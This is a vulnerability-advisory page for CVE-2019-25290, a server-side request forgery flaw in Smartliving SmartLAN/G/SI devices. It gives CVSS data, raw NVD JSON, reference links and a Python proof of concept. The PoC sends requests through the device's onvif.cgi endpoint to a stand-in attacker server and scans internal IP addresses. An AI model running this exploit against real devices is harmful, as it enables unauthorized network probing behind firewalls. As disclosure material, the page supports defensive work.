Security Vulnerability Report
中文
CVE-2019-25290 CVSS 5.3 MEDIUM

CVE-2019-25290

Published: 2026-01-08 00:15:59
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Smartliving SmartLAN/G/SI <=6.x contains an unauthenticated server-side request forgery vulnerability in the GetImage functionality through the 'host' parameter. Attackers can exploit the onvif.cgi endpoint by specifying external domains to bypass firewalls and perform network enumeration through arbitrary HTTP requests.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Smartliving SmartLAN/G/SI <= 6.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2019-25290 PoC - SSRF in Smartliving SmartLAN/G/SI # Target: Smartliving SmartLAN/G/SI <= 6.x # Endpoint: onvif.cgi def exploit_ssrf(target_url, attacker_server): """ Exploit SSRF vulnerability in GetImage functionality target_url: Target device URL (e.g., http://192.168.1.100) attacker_server: Attacker's controlled server to receive requests """ endpoint = f"{target_url}/onvif/cgi-bin/onvif.cgi" params = { 'Service': 'GetImage', 'host': attacker_server, # SSRF payload - arbitrary domain/IP 'port': '80', 'snap': 'true' } try: response = requests.get(endpoint, params=params, timeout=10) print(f"[*] Request sent to {endpoint}") print(f"[*] Response status: {response.status_code}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None # Internal network enumeration example def enumerate_internal(target_url): """Enumerate internal network by making requests to internal IPs""" endpoint = f"{target_url}/onvif/cgi-bin/onvif.cgi" # Example: Check internal web servers internal_ips = ['192.168.1.1', '192.168.1.100', '10.0.0.1'] for ip in internal_ips: params = {'Service': 'GetImage', 'host': ip, 'port': '80', 'snap': 'true'} try: response = requests.get(endpoint, params=params, timeout=5) print(f"[*] Internal IP {ip}: {response.status_code}") except: pass if __name__ == "__main__": # Usage example target = "http://target-device-ip" attacker = "http://attacker-controlled-server.com" exploit_ssrf(target, attacker)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25290", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:58.973", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Smartliving SmartLAN/G/SI <=6.x contains an unauthenticated server-side request forgery vulnerability in the GetImage functionality through the 'host' parameter. Attackers can exploit the onvif.cgi endpoint by specifying external domains to bypass firewalls and perform network enumeration through arbitrary HTTP requests."}, {"lang": "es", "value": "Smartliving SmartLAN/G/SI &lt;=6.x contiene una vulnerabilidad de falsificación de petición del lado del servidor no autenticada en la funcionalidad GetImage a través del parámetro 'host'. Los atacantes pueden explotar el endpoint onvif.cgi especificando dominios externos para eludir cortafuegos y realizar enumeración de red a través de peticiones HTTP arbitrarias."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172839", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/155617", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/47764", "source": "[email protected]"}, {"url": "https://www.inim.biz/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.